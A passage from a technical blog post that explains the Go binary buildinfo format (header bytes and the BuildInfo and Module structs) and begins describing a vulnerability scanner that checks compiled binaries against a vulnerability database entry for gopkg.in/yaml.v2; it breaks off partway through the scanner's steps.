example is shown in the code snippet below. The first 16-bytes is the structure
header. It starts with a 14-byte magic value of &lt;code&gt;0xff Go buildinf:&lt;/code&gt;. The next
byte is either &lt;code&gt;0x4&lt;/code&gt; or &lt;code&gt;0x8&lt;/code&gt; and gives the pointer size in bytes. The last
byte in the header indicates the bit-endianness, a &lt;code&gt;0x0&lt;/code&gt; means little-endian
while a &lt;code&gt;0x1&lt;/code&gt; means big-endian.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;- offset - 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
0x0086e000 ff20 476f 2062 7569 6c64 696e 663a 0800 . Go buildinf:..
0x0086e010 30a3 8800 0000 0000 70a3 8800 0000 0000 0.......p.......&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;Following the header are two pointers to two Go strings. Under the hood, a Go
string is a structure with a pointer to the start of the data as the first
field and a length of the data as the second field. The first string is the
version of the compiler that was used to compile the binary. The second string
is the build information. This string is only available if the project was
compiled with go modules enabled. The &lt;code&gt;runtime&lt;/code&gt; package has the logic to
&lt;a href="https://github.com/golang/go/blob/4d8db00641cc9ff4f44de7df9b8c4f4a4f9416ee/src/runtime/debug/mod.go#L37"target="_blank" rel="noopener"&gt;parse&lt;/a&gt;
the build info string into the &lt;code&gt;BuildInfo&lt;/code&gt; structure shown in the snippet
below. The structure essentially holds the information from the &lt;code&gt;go.mod&lt;/code&gt; file
plus the checksums from &lt;code&gt;go.sum&lt;/code&gt;.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-go" data-lang="go"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c1"&gt;// BuildInfo represents the build information read from&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="c1"&gt;// the running binary.&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="kd"&gt;type&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;BuildInfo&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kd"&gt;struct&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Path&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kt"&gt;string&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="c1"&gt;// The main package path&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Main&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Module&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="c1"&gt;// The module containing the main package&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Deps&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="nx"&gt;Module&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="c1"&gt;// Module dependencies&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="c1"&gt;// Module represents a module.&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="kd"&gt;type&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Module&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kd"&gt;struct&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Path&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kt"&gt;string&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="c1"&gt;// module path&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Version&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kt"&gt;string&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="c1"&gt;// module version&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Sum&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kt"&gt;string&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="c1"&gt;// checksum&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Replace&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="nx"&gt;Module&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="c1"&gt;// replaced by this module&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;The code in the
&lt;a href="https://github.com/golang/go/blob/master/src/runtime/debug/mod.go"target="_blank" rel="noopener"&gt;runtime&lt;/a&gt;
for parsing out this data structure has seen some changes in the last couple of
months. The logic has also been added as part of a sub-package in the
&lt;a href="https://github.com/golang/go/blob/master/src/debug/buildinfo/buildinfo.go"target="_blank" rel="noopener"&gt;&lt;code&gt;debug&lt;/code&gt;&lt;/a&gt;
package that can be assumed to be part of release Go 1.18. One thing that has
&lt;a href="https://github.com/golang/go/blob/5337e53dfa3f5fde73b8f505ec3a91c628e8f648/src/runtime/debug/mod.go#L40"target="_blank" rel="noopener"&gt;changed&lt;/a&gt;
with the structure is the addition of the &lt;code&gt;Settings&lt;/code&gt; field to hold more
information about the build environment.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-go" data-lang="go"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c1"&gt;// BuildInfo represents the build information read from a Go binary.&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="kd"&gt;type&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;BuildInfo&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kd"&gt;struct&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;GoVersion&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kt"&gt;string&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="c1"&gt;// Version of Go that produced this binary.&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Path&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kt"&gt;string&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="c1"&gt;// The main package path&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Main&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Module&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="c1"&gt;// The module containing the main package&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Deps&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="nx"&gt;Module&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="c1"&gt;// Module dependencies&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Settings&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt;&lt;span class="nx"&gt;BuildSetting&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="c1"&gt;// Other information about the build.&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="c1"&gt;// Module represents a module.&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="kd"&gt;type&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Module&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kd"&gt;struct&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Path&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kt"&gt;string&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="c1"&gt;// module path&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Version&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kt"&gt;string&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="c1"&gt;// module version&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Sum&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kt"&gt;string&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="c1"&gt;// checksum&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Replace&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="nx"&gt;Module&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="c1"&gt;// replaced by this module&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="c1"&gt;// BuildSetting describes a setting that may be used to understand how the&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="c1"&gt;// binary was built. For example, VCS commit and dirty status is stored here.&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="kd"&gt;type&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;BuildSetting&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kd"&gt;struct&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="c1"&gt;// Key and Value describe the build setting. They must not contain tabs&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="c1"&gt;// or newlines.&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Value&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kt"&gt;string&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;Until Go 1.18 is released, we can just copy the code from the runtime and use
it to parse the string into a useful data structure. With this information, we
get the versions and can easily detect which packages are part of a dependency
module.&lt;/p&gt;
&lt;h2&gt;Vulnerability Scanner&lt;span class="hx:absolute hx:-mt-20" id="vulnerability-scanner"&gt;&lt;/span&gt;
&lt;a href="#vulnerability-scanner" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;In this section, we are going to see how the extracted information can be used
to design a vulnerability scanner. There is currently a project of developing a
&lt;a href="https://golang.org/x/vuln"target="_blank" rel="noopener"&gt;vulnerability database&lt;/a&gt; and code for checking
against it. The goal with this scanner is instead of working with the source
code, it is to work with the compiled artifacts allowing users of a Go
application to check it for vulnerability. For our
&lt;a href="https://github.com/golang/vulndb/blob/master/reports/GO-2021-0061.yaml"target="_blank" rel="noopener"&gt;example&lt;/a&gt;,
we will use a vulnerability reported in the &lt;code&gt;gopkg.in/yaml.v2&lt;/code&gt; module. The code
snippet below shows the data available in the vulnerability database.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nt"&gt;module&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;gopkg.in/yaml.v2&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;additional_packages&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="c"&gt;# all of the incompatible versions of github.com/go-yaml/yaml&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="c"&gt;# are affected&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;- &lt;span class="nt"&gt;module&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;github.com/go-yaml/yaml&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;symbols&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;- &lt;span class="l"&gt;decoder.unmarshal&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;versions&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;- &lt;span class="nt"&gt;fixed&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;v2.2.3&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;description&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;|&lt;/span&gt;&lt;span class="sd"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="sd"&gt; Due to unbounded alias chasing, a maliciously crafted YAML file
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="sd"&gt; can cause the system to consume significant system resources. If
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="sd"&gt; parsing user input, this may be used as a denial of service vector.&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;published&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="ld"&gt;2021-04-14T12:00:00Z&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;credit&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;@simonferquel&amp;#34;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;symbols&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;- &lt;span class="l"&gt;decoder.unmarshal&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;links&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;pr&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;https://github.com/go-yaml/yaml/pull/375&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="nt"&gt;commit&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="l"&gt;https://github.com/go-yaml/yaml/commit/bb4e33bf68bf89cad44d386192cbed201f35b241&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;In addition to the module name &lt;code&gt;gopkg.in/yaml.v2&lt;/code&gt; we also have the fixed
version &lt;code&gt;v2.2.3&lt;/code&gt; and the affected symbol &lt;code&gt;decoder.unmarshal&lt;/code&gt;. What we can
decipher from this is that the &lt;code&gt;unmarshal&lt;/code&gt; method on the &lt;code&gt;decoder&lt;/code&gt; type prior
to &lt;code&gt;v2.2.3&lt;/code&gt; is vulnerable. With this information we can construct the following
logic to check for this vulnerability:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Extract the build information to see if the binary uses a version earlier
than &lt;code&gt;v2.2.3&lt;/code&gt;. If not, report as not vulnerable.&lt;/li&gt;
&lt;li&gt;Search for a function with the package name of &lt;code&gt;gopkg.in/yaml.v2&lt;/code&gt;, the
